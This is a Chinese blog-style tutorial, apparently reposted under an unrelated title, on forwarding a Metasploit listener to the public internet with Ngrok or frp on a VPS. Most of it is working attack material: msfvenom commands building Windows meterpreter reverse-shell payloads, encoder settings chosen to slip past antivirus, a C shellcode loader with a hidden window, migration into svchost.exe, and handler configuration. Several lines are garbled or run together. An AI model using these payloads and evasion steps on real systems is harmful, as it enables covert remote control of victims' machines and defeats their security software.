多平台统一管理软件接口,如何实现多平台统一管理软件接口
1266
2022-10-07
MSF映射到公网的常见方法(msf扫描内网主机)
0x01、前言在渗透测试的环节中,MSF可以说是老生常谈的必会工具之一,有的时候内网的MSF并不能满足我们的使用需求,此时我们需要借助一些方法来进行端口转发,这里简单的介绍下如何将内网中的MSF转发到公网。
0x02、常见的两种转发方式方法①:使用Ngrok内网映射
首先我们需要有一个Ngrok官网的账户,官网地址:80ngrok1
8888tcp
接下来,我们使用msf生成一个木马测试下
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 15 -f exe -o payload.exe这里简单说下木马的参数:
-p 选择指定payload
–e 选择制定编码器(不同编码器免杀效果也有不同,部分编码器应对火绒等杀软效果显著)
-i 编码次数
-b 去处多余/坏字符,lhost是你申请的ngrok服务器地址 lport是自定义的远程端口
-f 生成指定格式
-a 选择架构平台,包括x86 | x64 | x86_64
–platform 选择系统类型
当然也可以生成c的shellcode
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 15 -f c shellcode
使用VC++6.0对下面的代码进行编译
#include
#pragmacomment( linker, “/subsystem:”windows” /entry:”mainCRTStartup”")//运行时不显示窗口
unsignedchar buf[] =
“buf数组”;//将复制的数组粘贴到此处
main()
{((void(*)(void))&buf)();
}回归正题,使用msf监听模块监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 8888
exploitmeterpreter获取会话
msf
方法②:使用frp+vps内网映射
首先需要去gihub下载frp :这里我下载的linux 64的版本(因为服务器是linux),下载后分别放到本地kali和服务器上,解压后,然后分别去配置:
服务端配置frps.ini文件:
bind_addr = 0.0.0.0 //填0.0.0.0即可意为本机ipbind_port = 6531 //frp连接端口dashboard_addr = 0.0.0.0 //填0.0.0.0即可意为本机ipdashboard_port = 7500 //网页访问端口dashboard_user = admin //用户名dashboard_pwd = crlf //密码token = crlf //frp连接口令配置完成后,启动服务端
方法一:./frps - c frps.ini //前台启动,可以看到详细的监听xinxi方法二:nohup ./frps -c frps.ini > log.txt & //后台启动frp
启动成功后可以通过网页端访问来查看
web
接下来配置客户端kali的frpc.ini
[common]server_addr = 66.23.x.x //vps的ipserver_port = 6531 //连接frp的端口token = crlf //连接frp口令[msf]type = tcp //tcp协议local_ip = 127.0.0.1 //填127.0.0.1即可local_port = 6759 //转发到vps的点端口remote_port = 6000 //访问端口运行 ./frpc -c frpc.ini
frp_c
ok,接下来使用上面的msfvenom 生成测试木马
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 15 -f exe -o payload.exe也可以使用shellcode
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=远程服务端ip LPORT=远程服务端端口 -e x86/shikata_ga_nai -i 15 -b 'x00' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > shellcode.cPrependMigrate=true、PrependMigrateProc=svchost.exe 使木马程序会迁移到svchost.exe进程
也可以使用windows/meterpreter/reverse_tcp_rc4这个payload,进行会话加密,增加免杀能力
使用vc++6.0创建32位的项目并编译
#include
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 127.0.0.1 set lport 6759 // 本机转发端口
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~